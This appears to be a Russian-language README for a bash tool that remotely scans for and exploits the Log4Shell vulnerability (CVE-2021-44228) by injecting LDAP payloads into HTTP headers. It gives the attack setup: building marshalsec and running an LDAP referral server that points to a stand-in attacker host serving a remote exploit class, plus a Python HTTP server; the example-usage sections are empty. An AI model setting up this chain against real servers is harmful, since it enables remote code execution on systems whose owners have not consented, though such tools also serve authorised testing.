
Bash-скрипт, который позволяет идентифицировать уязвимость Log4j CVE-2021-44228 удаленно.
Скрипт на bash, который позволяет удаленно выявлять и/или эксплуатировать уязвимость Log4shell. Этот инструмент выполняет различные тесты, используя LDAP-полезные нагрузки и заголовки X-Api-Version, User-Agent и X-Forwarded-For.
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
Включим HTTP-сервер python3 -m http.server 8080
Установить Java #sudo apt install default-jre
Установить Curl #sudo apt-get install curl
Введите следующие параметры:
#Пример сканирования приложения во внутренней сети:

#Пример сканирования приложения в интернете:
